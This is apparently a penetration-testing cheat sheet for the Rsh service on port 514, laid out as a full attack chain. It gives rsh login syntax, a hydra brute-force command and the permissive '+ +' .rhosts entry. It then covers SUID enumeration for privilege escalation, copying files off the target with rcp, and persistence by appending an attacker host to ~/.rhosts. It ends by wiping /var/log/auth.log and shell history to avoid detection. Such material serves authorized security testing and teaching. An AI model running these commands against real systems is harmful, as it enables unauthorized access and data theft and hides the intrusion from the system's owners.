Rsh - Port 514

Basic Info

For authentication, .rhosts files along with /etc/hosts.equiv were utilized by Rsh. Authentication was dependent on IP addresses and the Domain Name System (DNS). The ease of spoofing IP addresses, notably on the local network, was a significant vulnerability.

Moreover, it was common for the .rhosts files to be placed within the home directories of users, which were often located on Network File System (NFS) volumes.

Default port: 514

Login

rsh <IP> <Command>
rsh <IP> -l domain\user <Command>
rsh domain/user@<IP> <Command>
rsh domain\\user@<IP> <Command>

Check for weak authentication mechanisms. RSH often relies on the .rhosts file for authentication, which can be easily exploited if not properly configured.

You can perform brute-force attacks to guess weak passwords using tools like hydra:

hydra -l <username> -P /path/to/passwords.txt <target_ip> rsh

This command attempts to brute-force the specified RSH server.

Look for misconfigured .rhosts files that allow unauthorized access. For example, a .rhosts file with the following entry can be exploited:

+ +

This entry allows any user from any host to log in without a password.

After gaining access, attempt to escalate privileges to a higher-level account. One common method is to search for SUID binaries:

rsh <remote-server-ip> -l <username> find / -perm -4000 -type f 2>/dev/null

This command lists all SUID binaries, which could potentially be exploited for privilege escalation.

Once you have access, you can exfiltrate data from the remote machine. For example, you can copy files using the rcp (remote copy) command:

rcp <remote-server-ip>:<remote-file-path> <local-file-path>

To maintain persistent access, you can add your SSH key to the ~/.ssh/authorized_keys file or modify the .rhosts file to allow your host:

echo "attacker-ip attacker-user" >> ~/.rhosts

This entry grants login permissions to the specified user on the attacker's IP address.

It's crucial to cover your tracks to avoid detection. You can delete log entries related to your activities:

rsh <remote-server-ip> -l <username> echo "" > /var/log/auth.log
rsh <remote-server-ip> -l <username> history -c

These commands clear the authentication log and command history.